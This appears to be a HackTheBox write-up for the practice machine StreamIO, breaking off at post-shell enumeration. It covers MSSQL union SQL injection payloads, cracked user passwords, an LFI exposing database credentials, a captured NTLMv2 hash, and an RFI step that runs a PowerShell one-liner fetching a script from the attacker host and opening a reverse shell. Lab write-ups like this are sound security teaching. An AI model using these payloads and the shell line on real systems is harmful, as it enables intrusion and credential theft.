# StreamIO - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

StreamIO was a decent, medium-rated HTB Windows machine created by [JDgodd](https://app.hackthebox.com/users/481778) and [nikk37](https://app.hackthebox.com/users/247264)

Foothold involves SQL injection, parameter fuzzing, LFI, and RFI.  
The user can be obtained by enumerating databases and saved Firefox passwords.  
Privilege escalation involves some enjoyable ACL abuses.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.158
Nmap scan report for 10.10.11.158
Host is up (0.090s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49702/tcp open  unknown
51277/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49702,51277 -oN streamio.nmap 10.10.11.158
Nmap scan report for 10.10.11.158
Host is up (0.093s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-11-29 03:21:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2023-11-29T03:23:21+00:00; -1h00m00s from scanner time.
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after:  2022-03-24T07:03:28
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
51277/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-11-29T03:22:43
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: -1h00m00s, deviation: 0s, median: -1h00m01s
```

Several ports are open, including DNS, Kerberos, SMB, RPC, LDAP, and WinRM. It's likely a DC.

We can start with LDAP enumeration:

```console
opcode@debian$ ldapsearch -x -H ldap://10.10.11.158 -s base -b "" -LLL
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=streamIO,DC=htb
ldapServiceName: streamIO.htb:dc$@STREAMIO.HTB
[--SNIP--]
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=streamIO,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=streamIO,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=streamIO,DC=htb
namingContexts: CN=Configuration,DC=streamIO,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=DomainDnsZones,DC=streamIO,DC=htb
namingContexts: DC=ForestDnsZones,DC=streamIO,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 143463
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=streamIO,DC=htb
dnsHostName: DC.streamIO.htb
defaultNamingContext: DC=streamIO,DC=htb
currentTime: 20231129032522.0Z
configurationNamingContext: CN=Configuration,DC=streamIO,DC=htb
```

We have the FQDN `DC.streamIO.htb` here. Also, nmap scan for port 443 has: `Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb`
We can add them to `/etc/hosts`:

```text
10.10.11.158 DC.streamIO.htb watch.streamIO.htb streamIO.htb DC
```

## SMB enumeration

We can enumerate SMB shares. [NetExec](https://github.com/Pennyw0rth/NetExec) is my tool of choice these days:

```console
opcode@debian$ docker run -it --entrypoint=/bin/bash --rm --name netexec nxc:latest
root@af911fbf33e2:~# echo '10.10.11.158 DC.streamIO.htb watch.streamIO.htb streamIO.htb DC' >> /etc/hosts
```

Testing for null session:

```console
root@af911fbf33e2:~# nxc smb 10.10.11.158 -d streamIO.htb -u '' -p '' --shares
SMB         10.10.11.158    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] streamIO.htb\: STATUS_ACCESS_DENIED 
SMB         10.10.11.158    445    DC               [-] Error getting user: list index out of range
SMB         10.10.11.158    445    DC               [-] Error enumerating shares: Error occurs while reading from remote(104)
```

Null sessions are disabled.

Testing for guest session:

```console
root@af911fbf33e2:~# nxc smb 10.10.11.158 -d streamIO.htb -u 'opcode' -p '' --shares
SMB         10.10.11.158    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.158    445    DC               [-] streamIO.htb\opcode: STATUS_LOGON_FAILURE 
```

Guest sessions are disabled as well.  
I also ran [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) for RPC enumeration, but it didn't find anything.

## Exploring the website

Port 80 is the default IIS website.  
The website on port 443, <https://streamio.htb> seems to be a movie streaming service:

![1](images/1.png)

```console
opcode@debian$ ffuf -c -w ~/CTF/wordlists/raft-small-words-lowercase.txt -u https://streamio.htb/FUZZ -e .php -mc all -fs 1245 -v 2>/dev/null
[Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 104ms]
| URL | https://streamio.htb/admin
| --> | https://streamio.htb/admin/
    * FUZZ: admin

[Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 99ms]
| URL | https://streamio.htb/index.php
    * FUZZ: index.php

[Status: 301, Size: 147, Words: 9, Lines: 2, Duration: 172ms]
| URL | https://streamio.htb/js
| --> | https://streamio.htb/js/
    * FUZZ: js

[Status: 301, Size: 151, Words: 9, Lines: 2, Duration: 200ms]
| URL | https://streamio.htb/images
| --> | https://streamio.htb/images/
    * FUZZ: images

[Status: 200, Size: 4145, Words: 796, Lines: 111, Duration: 205ms]
| URL | https://streamio.htb/login.php
    * FUZZ: login.php

[Status: 301, Size: 148, Words: 9, Lines: 2, Duration: 413ms]
| URL | https://streamio.htb/css
| --> | https://streamio.htb/css/
    * FUZZ: css

[Status: 200, Size: 4500, Words: 905, Lines: 121, Duration: 550ms]
| URL | https://streamio.htb/register.php
    * FUZZ: register.php

[Status: 200, Size: 6434, Words: 2010, Lines: 206, Duration: 510ms]
| URL | https://streamio.htb/contact.php
    * FUZZ: contact.php

[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 171ms]
| URL | https://streamio.htb/logout.php
| --> | https://streamio.htb/
    * FUZZ: logout.php

[Status: 200, Size: 7825, Words: 2228, Lines: 231, Duration: 104ms]
| URL | https://streamio.htb/about.php
    * FUZZ: about.php

[Status: 301, Size: 150, Words: 9, Lines: 2, Duration: 671ms]
| URL | https://streamio.htb/fonts
| --> | https://streamio.htb/fonts/
    * FUZZ: fonts

[Status: 200, Size: 13497, Words: 5027, Lines: 395, Duration: 852ms]
| URL | https://streamio.htb/.
    * FUZZ: .

[--SNIP--]
```

I created an account on `/register.php`, but the credentials did not work on `/login.php`.  
`/about.php` leaks three potential usernames: `Barry`, `Oliver`, and `Samantha` but `kerbrute` fails to validate them.  
Nothing interesting was available in their image metadata either.

The subdomain <https://watch.streamio.htb/> has FAQs related to the service and can add emails to their subscription list:

![2](images/2.png)

```console
opcode@debian$ ffuf -c -w ~/CTF/wordlists/raft-small-words-lowercase.txt -u https://watch.streamio.htb/FUZZ -e .php -mc all -fs 1245 -v 2>/dev/null
[Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 207ms]
| URL | https://watch.streamio.htb/index.php
    * FUZZ: index.php

[Status: 200, Size: 253887, Words: 12366, Lines: 7194, Duration: 426ms]
| URL | https://watch.streamio.htb/search.php
    * FUZZ: search.php

[Status: 301, Size: 157, Words: 9, Lines: 2, Duration: 182ms]
| URL | https://watch.streamio.htb/static
| --> | https://watch.streamio.htb/static/
    * FUZZ: static

[Status: 200, Size: 2829, Words: 202, Lines: 79, Duration: 214ms]
| URL | https://watch.streamio.htb/.
    * FUZZ: .

[Status: 200, Size: 677, Words: 28, Lines: 20, Duration: 208ms]
| URL | https://watch.streamio.htb/blocked.php
    * FUZZ: blocked.php

[--SNIP--]
```

`/search.php` allows us to search for movies.

## MSSQL injection

I tested the login page <https://streamio.htb/login.php> for SQL injections with [sqlmap](https://github.com/sqlmapproject/sqlmap)

```console
opcode@debian$ sqlmap -r login.req --force-ssl --batch
```

It came out as vulnerable:

```text
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: username=opcode';WAITFOR DELAY '0:0:5'--&password=opcode
---
```

I first tried `xp_cmdshell`, but it did not work:

```text
username=opcode';exec master..xp_cmdshell 'ping 10.10.14.44'--&password=opcode
```

After that, I dumped database and table names using `sqlmap`. It was painfully slow, but I used it for a while when solving the box.  
Even though we can perform stacked queries, we cannot exfiltrate any data without using time-based injection.  
For SQL injection, the best targets are the mechanisms that grab information from the database and display it on website.  
<https://watch.streamio.htb/search.php> meets the criteria.

But `sqlmap` fails to detect anything here. Even the payload `opcode';WAITFOR DELAY '0:0:5'--` results in it detecting our query as malicious.  
After asking for a hint, I learnt that there is a `sqlmap` choker in place:

```php
$search = strtolower($_POST['q']);

// sqlmap choker
$shitwords = ["/WAITFOR/i", "/vkBQ/i", "/CHARINDEX/i", "/ALL/i", "/SQUARE/i", "/ORDER/i", "/IF/i","/DELAY/i", "/NULL/i", "/UNICODE/i","/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "ifnull/i", "/ or /i"];
foreach ($shitwords as $shitword) {
    if (preg_match( $shitword, $search )) {
        header("Location: https://watch.streamio.htb/blocked.php");
        die("blocked");
    }
}
```

Surprisingly, a basic union injection payload works fine. I found the number of columns to be 6:

```text
abcd' union select 1,2,3,4,5,6-- -
```

2 and 3 get displayed in search result.  
Enumerate databases:

```text
abcd' union select 1,name,3,4,5,6 from master..sysdatabases-- -
```

We get `master,model,msdb,STREAMIO,streamio_backup,tempdb`.  
Only `STREAMIO` and `streamio_backup` are non-default.  
Enumerate tables:

```text
abcd' union select 1,name,3,4,5,6 from streamio_backup..sysobjects WHERE xtype = 'U'-- -
```

It comes out empty.

```text
abcd' union select 1,name,3,4,5,6 from STREAMIO..sysobjects WHERE xtype = 'U'-- -
```

We get `movies` and `users`. `users` is the table of interest.  
Enumerate columns:

```text
abcd' union select 1,id,3,4,5,6 from sysobjects WHERE name = 'users'-- -
```

We get `901578250`

```text
abcd' union select 1,name,3,4,5,6 from syscolumns WHERE id = 901578250-- -
```

We get `id,is_staff,password,username`  
Dump them all:

```console
abcd' union select 1,concat(id,' ',is_staff,' ',username,' ',password),3,4,5,6 from users-- -
```

We get:

```text
10 1 Thane 3577c47eb1e12c8ba021611e1280753c
11 1 Carmon 35394484d89fcfdb3c5e447fe749d213
12 1 Barry 54c88b2dbd7b1a84012fabc1a4c73415
13 1 Oliver fd78db29173a5cf701bd69027cb9bf6b
14 1 Michelle b83439b16f844bd6ffe35c02fe21b3c0
15 1 Gloria 0cfaaaafb559f081df2befbe66686de0
16 1 Victoria b22abb47a02b52d5dfa27fb0b534f693
17 1 Alexendra 1c2b3d8270321140e5153f6637d3ee53
18 1 Baxter 22ee218331afd081b0dcd8115284bae3
19 1 Clara ef8f3d30a856cf166fb8215aca93e9ff
20 1 Barbra 3961548825e3e21df5646cafe11c6c76
21 1 Lenord ee0b8a0937abd60c2882eacb2f8dc49f
22 1 Austin 0049ac57646627b8d7aeaccf8b6a936f
23 1 Garfield 8097cedd612cc37c29db152b6e9edbd3
24 1 Juliette 6dcd87740abb64edfa36d170f0d5450d
25 1 Victor bf55e15b119860a6e6b5a164377da719
26 1 Lucifer 7df45a9e3de3863807c026ba48e55fb3
27 1 Bruno 2a4e2cf22dd8fcb45adcb91be1e22ae8
28 1 Diablo ec33265e5fc8c2f1b0c137bb7b3632b5
29 1 Robin dc332fb5576e9631c9dae83f194f8e70
3 1 James c660060492d9edcaa8332d89c99c9239
30 1 Stan 384463526d288edcc95fc3701e523bc7
31 1 yoshihide b779ba15cedfd22a023c4d8bcf5f2332
33 0 admin 665a50ac9eaa781e4f7f04199db97a11
34 0 opcode 882c467d02aec1bcbdb94b1a18d9b210
4 1 Theodore 925e5408ecb67aea449373d668b7359e
5 1 Samantha 083ffae904143c4796e464dac33c1f7d
6 1 Lauren 08344b85b329d7efd611b7a7743e8a09
7 1 William d62be0dc82071bccc1322d64ec5b6c51
8 1 Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
9 1 Robert f03b910e2bd0313a23fdd7575f34a694
```

The account I created is present as well.  
We can separate out hashes to crack them:

```console
opcode@debian$ awk '{print $4}' dump.txt > hashes.txt
```

A bunch of them cracked on <https://crackstation.net/>:

```console
Thane      highschoolmusical
Barry      $hadoW
Michelle   !?Love?!123
Victoria   !5psycho8!
Clara      %$clara
Lenord     physics69i
Juliette   $3xybitch
Bruno      $monique$1991$
yoshihide  66boysandgirls..
admin      paddpadd
opcode     opcode
Lauren     ##123a8j8w5123##
Sabrina    !!sabrina$
```

Separate out usernames to be used with `kerbrute`:

```console
opcode@debian$ awk '{print $3}' dump.txt > potential_users.txt
```

Now we can try `kerbrute` to find usernames valid on the domain controller:

```console
opcode@debian$ kerbrute userenum ~/potential_users.txt --dc 10.10.11.158 -d streamIO.htb

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/30/23 - Ronnie Flathers @ropnop

2023/11/30 01:10:09 >  Using KDC(s):
2023/11/30 01:10:09 >   10.10.11.158:88

2023/11/30 01:10:10 >  [+] VALID USERNAME:   yoshihide@streamIO.htb
2023/11/30 01:10:10 >  Done! Tested 31 usernames (1 valid) in 0.455 seconds
```

`yoshihide` is the only account present, but his password doesn't match:

```console
opcode@debian$ echo yoshihide | kerbrute passwordspray --dc 10.10.11.158 -d streamIO.htb - '66boysandgirls..' -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 11/30/23 - Ronnie Flathers @ropnop

2023/11/30 08:14:07 >  Using KDC(s):
2023/11/30 08:14:07 >   10.10.11.158:88

2023/11/30 08:14:07 >  [!] yoshihide@streamIO.htb:66boysandgirls.. - Invalid password
2023/11/30 08:14:07 >  Done! Tested 1 logins (0 successes) in 0.196 seconds
```

## Admin panel and parameter fuzzing

We can log in to <https://streamio.htb/login.php> with the credentials `yoshihide:66boysandgirls..`  
After logging in, the `/admin` endpoint is accessible. There, we have a bunch of URLs with parameters `user`, `staff`, `movie` and `message`.  
I tested each one for local file disclosure without any success.  
All these parameters suggest the possibility of a hidden parameter. We can fuzz for that.  
For fuzzing, we also need to ensure that `PHPSESSID` cookie is set to our session cookie:

```console
opcode@debian$ ffuf -c -w ~/CTF/wordlists/burp-parameter-names.txt -u 'https://streamio.htb/admin?FUZZ=/Windows/System32/drivers/etc/hosts' -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' -mc all -r -fs 1678 -v 2>/dev/null
[Status: 200, Size: 2577, Words: 262, Lines: 71, Duration: 90ms]
| URL | https://streamio.htb/admin?debug=/Windows/System32/drivers/etc/hosts
    * FUZZ: debug

[Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 104ms]
| URL | https://streamio.htb/admin?movie=/Windows/System32/drivers/etc/hosts
    * FUZZ: movie

[Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 105ms]
| URL | https://streamio.htb/admin?staff=/Windows/System32/drivers/etc/hosts
    * FUZZ: staff

[Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 156ms]
| URL | https://streamio.htb/admin?user=/Windows/System32/drivers/etc/hosts
    * FUZZ: user
```

It found the hidden parameter `debug`

## Local File Inclusion

Using the `debug` parameter leads to a local file disclosure vulnerability:

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=/Windows/System32/drivers/etc/hosts' | tail -n +47
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
#   ::1             localhost
127.0.0.1   watch.streamio.htb streamio.htb
[--SNIP--]
```

It is somewhat messy, but it works.  
Since it is a PHP server, PHP filters can be used:

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=/Windows/win.ini' | sed '47q;d' | xargs | awk -F's only| </div>' '{print $2}' | base64 -d
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```

We can look at the application's source:

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php' | sed '47q;d' | xargs | awk -F's only| </div>' '{print $2}' | base64 -d
```

We get:

```php
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
    header('HTTP/1.1 403 Forbidden');
    die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);

[--SNIP--]

            <?php
                if(isset($_GET['debug']))
                {
                    echo 'this option is for developers only';
                    if($_GET['debug'] === "index.php") {
                        die(' ---- ERROR ----');
                    } else {
                        include $_GET['debug'];
                    }
                }
                else if(isset($_GET['user']))
                    require 'user_inc.php';
                else if(isset($_GET['staff']))
                    require 'staff_inc.php';
                else if(isset($_GET['movie']))
                    require 'movie_inc.php';
                else 
            ?>
```

The MSSQL credentials `db_admin:B1@hx31234567890` are available, but port 1433 is not exposed.  
The PHP files mentioned here are not useful. The same goes for `../index.php`.

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=../login.php' | sed '47q;d' | xargs | awk -F's only| </div>' '{print $2}' | base64 -d
```

```php
[--SNIP--]
<?php
$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
function bad_char_check($name)
{
  $bad_chars = array('!','"','#','$','%','&','\\','\'','(',')','*','+',',','-','.','/',':',';','<','=','>','?','@','[',']','^','`','{','|','}','~');
  foreach ($bad_chars as $chars) {
    if (strpos($name,$chars) !== false) {
      return false;
    }
  }
  return true;
}

if(isset($_POST['username']) && isset($_POST['password']))
{
  # login here
    ## Check from db here dbch
    $user = $_POST['username'];
    $pass = md5($_POST['password']);
    $query = "select * from users where username = '$user' and password = '$pass'";
    $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
    if(sqlsrv_num_rows($res) == 1 && $user === 'yoshihide')
    {
        # Login success
        $_SESSION['logged_in'] = 1;
        # Admin success
        $_SESSION['admin'] = 1;
        header("Location: https://streamio.htb/");
    }
    else
    {
?>
```

Another set of credentials is present: `db_user:B1@hB1@hB1@h`  
The PHP code forbids users other than `yoshihide` from logging in.  
In `../register.php`, the SQL queries are being queried as `db_admin`.

I guessed the subdomain webroot to be present at `../../watch.streamio.htb`:

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=../../watch.streamio.htb/search.php' | sed '47q;d' | xargs | awk -F's only| </div>' '{print $2}' | base64 -d
```

```php
<?php
$search = strtolower($_POST['q']);

// sqlmap choker
$shitwords = ["/WAITFOR/i", "/vkBQ/i", "/CHARINDEX/i", "/ALL/i", "/SQUARE/i", "/ORDER/i", "/IF/i","/DELAY/i", "/NULL/i", "/UNICODE/i","/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "ifnull/i", "/ or /i"];
foreach ($shitwords as $shitword) {
    if (preg_match( $shitword, $search )) {
        header("Location: https://watch.streamio.htb/blocked.php");
        die("blocked");
    }
}


# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
if (!isset($_POST['q']))
{
    
    $query = "select * from movies order by movie";
    $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered"));
}
else
{
    $_SESSION['no_of_reqs'] +=1;
    $query = "select * from movies where movie like '%".$_POST['q']."%' order by movie";
    $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); 
}
?>
```

Nothing interesting here either.  
I assumed it was `xampp` and tried to guess the location of the log files, but I could not find them.  
I also tried using a UNC path to force an NTLM authentication:

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=//10.10.14.44/opcode'
```

I was able to grab an encrypted challenge with [Responder](https://github.com/lgandx/Responder):

```text
[SMB] NTLMv2-SSP Client   : 10.10.11.158
[SMB] NTLMv2-SSP Username : streamIO\yoshihide
[SMB] NTLMv2-SSP Hash     : yoshihide::streamIO:f71818d11d45462a:6A06B2ABC14E9366AB1A0B072F400947:01010000000000008000D9047F23DA01965AF29CFFA81BBB00000000020008004F0050004C00420001001E00570049004E002D0037004F00300041003500390042004D00390035004D0004003400570049004E002D0037004F00300041003500390042004D00390035004D002E004F0050004C0042002E004C004F00430041004C00030014004F0050004C0042002E004C004F00430041004C00050014004F0050004C0042002E004C004F00430041004C00070008008000D9047F23DA0106000400020000000800300030000000000000000000000000210000115A9657E72AE677A819F91E35937604131CA10870D3B39756FC84DE39089ADD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00330038000000000000000000
```

But I could not crack the password.  
I also tried the passwords `B1@hB1@hB1@h` and `B1@hx31234567890` for yoshihide, but they were invalid.

## Remote File Inclusion

The LFI vulnerability is caused by `include`. Remote File Exclusion might be possible, too.  
To test for it, I created `RFI.php`:

```php
<?php system('powershell.exe IEX(IWR http://10.10.14.44:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.44 9001');?>
```

Then, I ran:

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=http://10.10.14.44:8000/RFI.php'
```

The RFI attempt failed. `php.ini`, by default, is hardened against RFI.  
I asked for a hint and learnt that I had missed a step in my enumeration.  
While enumerating for the hidden parameter `debug`, I should also have enumerated pages inside `/admin`.  
If I did that, I would have found `master.php`:

```console
opcode@debian$ curl -s -k -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php' | sed '47q;d' | xargs | awk -F's only| </div>' '{print $2}' | base64 -d
```

The key bit is:

```php
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>
```

I guess this is the author's "workaround" to allow RFI. I think they could have just modified `php.ini`  
Also, `master.php` cannot be called directly:

```php
if(!defined('included'))
        die("Only accessable through includes");
```

`index.php` sets `included` to `true`, so `master.php` can be indirectly invoked through the LFI.  
Since it is an `eval`, I changed my `RFI.php` to:

```php
system('powershell.exe IEX(IWR http://10.10.14.44:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.44 9001');
```

Now,

```console
opcode@debian$ curl -s -k -X POST -b 'PHPSESSID=jfilk7ejn1tasf345gouia4ged' 'https://streamio.htb/admin/?debug=master.php' -d 'include=http://10.10.14.44:8000/RFI.php'
```

With that, I got shell as `yoshihide`

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name          SID
================== ============================================== 
streamio\yoshihide S-1-5-21-1470860369-1569627196-4264678630-1107 


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

Nothing useful here.

```console
PS C:\> netstat -ano -p TCP | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       896
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       896
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       3704
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2604
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       488
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1164
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1544
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49675          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       644
  TCP    0.0.0.0:49687          0.0.0.0:0              LISTENING       624
  TCP    0.0.0.0:49697          0.0.0.0:0              LISTENING       2780
  TCP    0.0.0.0:49711          0.0.0.0:0              LISTENING       2724
  TCP    10.10.11.158:53        0.0.0.0:0              LISTENING       2780
  TCP    10.10.11.158:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING       2780
```

The MSSQL port 1433 is internally available.

We can try running [adPEAS](https://github.com/61106960/adPEAS):

```console
